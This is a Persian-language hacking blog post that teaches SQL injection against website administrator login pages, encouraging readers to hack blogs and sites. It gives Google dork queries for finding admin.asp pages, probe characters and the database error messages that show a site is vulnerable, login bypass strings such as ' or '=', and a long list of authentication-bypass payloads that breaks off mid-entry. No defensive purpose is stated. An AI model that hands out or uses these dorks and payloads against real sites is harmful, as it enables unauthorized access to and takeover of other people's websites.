عزیزم بیا بهت هک وبلاگ یاد بدم بد خودت برو وبلاگ هک کن کوچولو
http://habib-hacker.blogfa.com/
www.shimahacker.blogfa.com
در این پست آموزش SQL Injection کردن را به شما می گویم در این روش من سعی می کنم به طور کاملا حرفه ای SQL Injection کردن را به شما آموزش بدهم
هکرهای نیمه حرفه ای گاهی برای این که بتوانند از راه دور به سایت هایی که صفحه ورود مدیر دارند وارد شوند از حملاتی به نام SQL Injection استفاده کرده و به این روش کدهایی را در پایگاه داده SQL یک سرور وارد می کنند که این کدها باعث اختلال در برنامه شده و هکر به صفحه اصلی مدیریت سایت وارد می شود و می تواند کارهای مختلفی انجام دهد اگر پست قبلی مرا خوانده باشید به شما گفتم که به وسیله یک اکسپلویت می توانید وبلاگ ها را هک کنید و چون SQL Injection را آموزش نداده بودم امکان داشت برای افراد تازه کار سوالات پیش آید
آموزش SQL Injection کردن:
اگر شما به یک سایت بروید در واقع به پورت 80 آن سایت وصل شده اید به همین دلیل هنگامی که وارد صفحه ورود مدیر می شود در واقع در واقع به صورت کاملا تصادفی فایروال آن سرور را رد کرده اید زیرا اکثر فایروال ها برای پورت 80 ممنوعیت خاصی قایل نمی شوند برای این که بتوانید وارد صفخه ورود شوید در گوگل واژه های زیر را Search کنید:
Inurl:/admin.asp
Inurl:/admin.asp "Powered by My SQL"
Inurl:/admin.asp "Powered by MSSQL"
البته همه سایت هایی را که به این روش پیدا می کنید را نمی توانید هک کنید زیرا یا ورژن جدید هستند یا برنامه بالا است و باید بر روی هر صفحه تست بکنید که این قابلیت را دارد یا خیر برای این کار می توانید از کاراکترهای ویژه مثل *"; استفاده بکنید برای مثال در قسمت Username و Password کارکترهای زیر را بنویسید:
Username:'user
Password:'pas
البته همیشه از یک کارکتر خاص استفاده نکنید و مثل زیر عمل کنید
Username:"*%user
Password:'%;pas
اگر این کدها را وارد کردید و به Error های زیر بر خورد کردید سایت آسیب پذیر می باشد:
The page cannot be displayed
There is a problem with the page you are trying to reach and it cannot be displayed.
ALL ODBC Error Messages
Microsoft OLE DB Provider for ODBC drivers error
Microsoft OLE DB Provider for ODBC drivers error '80040e14 '
[Microsoft][ODBC SQL Server] Incorrect syntax near the keyword 'or'.
/verify .asp, line .
Microsoft OLE DB Provider for ODBC drivers error '80040e14 '
[Microsoft] [ODBC SQL Server] Unclosed quotation mark before the
character string
Microsoft OLE DB Provider for ODBC Drivers error '80004005 '
[Microsoft][ODBC Microsoft Access Driver]
Microsoft JET Database Engine error '80040e14 '
با این روش شما می توانید سایت های که قابل هک شدن هستن را هک کنید و وارد صفحه اصلی مدیر شوید برای این کار شما باید در قسمت Username و Password کدهای زیر را بنویسید:
Username:admin
Password:' or'=*
Username:admin " or "a"="a
Password:' or'='
به این ترتیب وارد صفخه مدیر می شوید بعضی مواقع شما باید کدها را با هم وارد کرده و گاهی یک به یک کدها را بنویسید شما می توانید کدهای کامل برای حملات SQL Injection را در زیر بیابید ... موفق باشید Embarassed Surprised !!
کد:
' or ' '=' ' or 'a'='a 'or'a'='a admin'-- admin' or = -- ' or = ' or = -- admin" or "a"="a admin" or = -- admin' or 'a'='a admin') or ('a'='a or = -- ' or = # hi' or = -- hi" or = -- hi" or "a"="a ") or ("a"="a ') or ('a'='a " or "a"="a hi") or ("a"="a hi') or ('a'='a " or = # " or = -- ' or ''=' admin" or "a"="a admin" or 1=1 -- admin' or 1=1 - admin' or 'a'='a admin') or ('a'='a admin") or ("a"="a usuario='geek' senha='s3nh4' usuario='' or '1' senha='s3nh4' usuario= 'or' senha= 'or' usuario=' or ' 1 senha=' or ' 1 usuario='1' = '1' usuario="12345" senha="12345" usuario="VB" senha="VB" usuario="visual" senha="visual" usuario="basic" senha="basic" usuario=' or senha='teste senha=' or senha='teste usuario=' or senha='login senha=' or senha='login usuario=' or email like 'flavio% se ' or "=' 'or"=' admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a m
